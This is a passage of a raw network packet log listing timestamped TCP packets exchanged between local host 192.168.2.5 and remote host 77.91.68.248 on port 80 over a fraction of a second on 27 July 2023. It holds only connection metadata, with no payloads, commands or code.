Jul 27, 2023 01:33:02.950081110 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950109959 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950115919 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950115919 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950139046 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950167894 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950181007 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950181007 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950196981 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950228930 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950237036 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950237036 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950258970 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950289011 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950319052 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950349092 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950377941 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950381041 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950381041 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950407028 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950428009 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950437069 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950449944 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950465918 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950495005 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950505972 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950505972 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950524092 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950555086 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950561047 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950561047 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950586081 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950614929 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950628042 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950628042 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950644970 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950647116 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950675011 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950705051 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950735092 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950738907 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950738907 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950762987 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950792074 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950793028 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950823069 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950849056 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950879097 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950886965 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950886965 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950907946 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950937986 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950946093 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950946093 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.950968027 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.950990915 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.951061964 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.951061964 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.970948935 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.971497059 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992073059 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992122889 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992155075 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992185116 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992188931 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992219925 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992249966 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992255926 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992288113 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992322922 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992352962 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992358923 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992358923 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992389917 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992420912 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992450953 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992472887 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992480993 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992510080 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992511034 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992542982 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992573977 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992584944 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992584944 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992607117 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992640018 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992654085 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992654085 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992671013 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992702007 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992732048 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992746115 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992746115 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992763996 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992795944 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992803097 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992803097 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992821932 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992845058 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992846966 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992866993 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992893934 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992930889 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992960930 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.992964029 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992964029 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.992991924 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993021965 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993043900 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993043900 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993052959 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993083000 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993084908 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993084908 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993113041 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993144035 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993164062 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993164062 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993171930 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993205070 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993233919 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993264914 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993288994 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993288994 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993293047 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993324995 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993354082 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993362904 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993362904 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993386030 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993417025 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993429899 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993429899 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993447065 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993475914 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993475914 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993509054 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993540049 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993540049 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993542910 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993573904 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993603945 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993613958 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993613958 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993633986 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993664026 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993669987 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993669987 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993694067 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993719101 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993745089 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993753910 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993773937 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993783951 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993815899 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993839979 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993839979 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993846893 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993876934 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993896961 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993896961 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993906975 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993918896 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.993941069 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993976116 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.993978977 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994008064 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994039059 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994040012 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994039059 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994062901 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994082928 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994102955 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994128942 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994128942 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994137049 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994168043 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994198084 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994204998 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994230032 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994240999 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994240999 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994261026 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994297028 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994330883 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994352102 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994362116 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994373083 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994393110 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994406939 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994421005 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994452953 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994468927 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994468927 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994484901 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994513988 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994539976 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994539976 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994548082 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994579077 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994590998 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994609118 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994642019 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994656086 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994656086 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994673014 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994680882 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994703054 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994714022 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994714022 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994734049 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994764090 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994776964 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994776964 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994792938 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994807005 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994822979 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994853020 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994870901 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994870901 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994883060 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994894981 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994914055 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994941950 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994946957 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994946957 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.994971991 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.994978905 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995001078 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995029926 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995047092 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995047092 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995063066 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995091915 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995110035 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995110035 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995121956 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995151043 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995165110 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995165110 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995182037 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995212078 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995223045 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995223045 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995240927 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995270014 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995271921 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995301008 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995318890 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995318890 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995332956 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995359898 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995363951 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995393991 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995412111 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995424032 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995450020 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995450020 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995455980 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995486021 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995486975 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995517015 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995548010 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995552063 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995577097 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995608091 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995608091 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995634079 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995634079 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995636940 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995668888 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995695114 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995695114 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995711088 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995742083 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995753050 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995753050 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995771885 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995801926 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995807886 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995832920 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995853901 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995853901 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995862961 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995893002 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995907068 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995924950 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995934963 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995935917 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995955944 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.995970011 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.995985031 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996015072 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996016026 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996016026 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996045113 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996073008 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996076107 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996104002 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996107101 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996138096 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996138096 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996138096 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996169090 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996200085 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996200085 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996228933 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996248960 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996248960 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996258974 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996299028 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996320963 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996330023 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996361971 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996371031 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996371031 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996392965 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996423960 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996449947 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996449947 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996454000 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996471882 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996484041 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996515036 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996520042 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996520042 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996547937 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996578932 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996581078 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996608973 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996615887 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:02.996639013 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:02.996653080 CEST	49725	80	192.168.2.5	77.91.68.248
